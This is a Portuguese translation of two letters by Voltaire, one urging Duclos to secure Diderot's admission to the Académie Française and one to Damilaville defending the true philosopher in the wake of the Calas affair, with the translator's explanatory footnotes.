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A CANDIDATURA DE DIDEROT À ACADEMIA

Ao Sr. Duclos23

11 de Agosto (1760).

Sei, há muito tempo, senhor, que possuís tanta nobreza no coração quanta justiça no espírito, e disso me dais hoje novas provas. Não duvido de que conseguireis introduzir Diderot na Academia Francesa se empreenderdes essa delicada empresa; vejo que a julgais necessária às letras e à filosofia nas circunstâncias presentes. Por pouco que Diderot vos secunde com algumas demarches prudentes e bem calculadas junto aos que podarão prejudicá-lo, vós obtereis êxito certo junto aos que poderão servi-lo. Está ao vosso alcance, creio, falar com Mme. Pompadour, e uma vez que ela induza o rei a aprovar a admissão de Diderot, acredito que ninguém terá ousadia suficiente para se opor a isso. Não estamos mais no tempo dos teatinos bispos de Mirepoix 24; não vos será, aliás, difícil ver com quantas vozes podeis contar na Academia. Tereis a honra de haver feito cessar a perseguição 25, de haver vingado a literatura e assegurado a tranquilidade de um dos homens mais admiráveis do mundo, e que é, sem dúvida, vosso amigo. O Sr. d’Alembert parece disposto a fazer tudo que julgardes oportuno para o êxito desta empresa. Tomo a liberdade de exortar a ambos a se estimarem mutuamente de todo coração; é chegado o tempo em que todos os filósofos devem ser irmãos, sem o que os fanáticos e os relapsos os devorarão a todos, uns após outros. . .

23 Autor de uma História de Luís XI; membro da Academia Francesa, da qual se tornou secretário perpétuo. Faleceu em 1772.

24 Alusão a Boyer, bispo de Mirepoix e preceptor do Delfim, que havia feito grande campanha contra a candidatura de Voltaire à Academia. O filósofo de Ferney não se esquecera disso.

25 Diderot acabava de sofrer a interdição da " Enciclopédia", e lhe havia sido proibido apresentar-se em qualquer academia.

. . . Vem-me à cabeça a ideia de que o trabalho do vosso Dicionário 26 constitui a razão mais plausível e mais forte para acolherdes Diderot. Não poderíeis mostrar ou fazer sentir o quanto um tal homem se torna necessário para a perfeição de uma obra necessária? Não poderíeis, depois de haverdes assestado subtilmente essa bateria, reunir sete ou oito membros e enviar uma delegação ao rei, para solicitar-lhe Diderot, como o mais capaz para colaborar no vosso empreendimento? O duque de Nivernais 27 não vos secundaria nesse projecto? Não poderia, mesmo, encarregar-se de levar convosco a palavra?…

APOLOGIA DOS FILÓSOFOS

Ao Sr. Damilaville

Castelo de Ferney, 1.° de Março de 1765.

Devorei, meu caro amigo, as novas memórias de Beaumont sobre a inocência dos Calas; admirei-as, verti lágrimas, mas nada de novo aprendi; há muito que dela estava convencido, e tive mesmo a felicidade de apresentar as primeiras provas.

.. . Vossas paixões são o amor à verdade e à humanidade, e o ódio à calúnia. Da semelhança dos nossos caracteres nasceu a nossa amizade. Tenho passado a vida a procurar, a proclamar essa verdade que amo. Que outro dos nossos historiadores modernos defendeu a memória de um grande príncipe contra as imposturas atrozes de não sei que escritor 28, ao qual se pode chamar de caluniador dos reis, dos ministros e dos grandes capitães, e que, entretanto, hoje não encontra sequer um leitor?

26 Duelos preparava uma nova edição do Dicionário, que apareceu em 1762.

27 O duque de Nivernais tinha grande simpatia pelos filósofos.

28 Trata-se de La Beaumclle e de suas notas sobre o Século dc Luís XIV.

 

Não fiz, nos horríveis desastres de Calas e de Sirven, senão o que fazem todos os homens: segui minhas inclinações. As de um filósofo não é lamentar os infelizes; é prestar-lhes auxílio.

Sei com que furor o fanatismo se ergue contra a filosofia. Esta tem duas filhas que aquele desejaria aniquilar, como Calas: a Verdade e a Tolerância, enquanto a filosofia não deseja senão desarmar as filhas do fanatismo: a Mentira e a Perseguição.

Os que não sabem raciocinar querem desacreditar os que possuem esse dom; confundem o filósofo com o sofista. Estão muito enganados. O verdadeiro filósofo pode, por vezes, irritar-se contra a calúnia que persegue a ele próprio; pode cobrir de desprezo o vil mercenário que ultraja, duas vezes por mês20, a razão, o bom gosto e a virtude; pode mesmo, ao passar, lançar ao ridículo os que insultam a literatura no santuário onde deviam honrá-la; mas não conhece nem cabalas, nem surdas práticas, nem a vingança. Sabe, como o sábio de Montbard 30, como o de Voré 31, tornar a terra mais fértil e seus habitantes mais felizes. O verdadeiro filósofo desbrava os campos incultos, aumenta o número das charruas e, por conseguinte, dos habitantes; dá ocupação ao pobre e enriquece-o; encoraja os casamentos; adopta o órfão; não murmura contra os impostos necessários e põe o agricultor em condições de pagá-los com satisfação. Nada espera dos homens e lhes faz todo bem de que é capaz. Tem horror ao hipócrita, mas lamenta o supersticioso; enfim, sabe ser amigo.

Percebo que estou fazendo vosso retrato e que nele nada faltaria se tivésseis a felicidade de morar no campo.

29 Alusão ao Année lttéraire, de Fréron, que aparecia duas vezes por mês.

30 Buffon, que residia em Montbard, sua cidade natal, na Borgonha.

31 Helvetius, que tinha em Voré uma propriedade, onde passava oito meses do ano.

Fonte: VOLTAIRE. Clássicos Jackson vol XXII. Tradução de Brito Broca.

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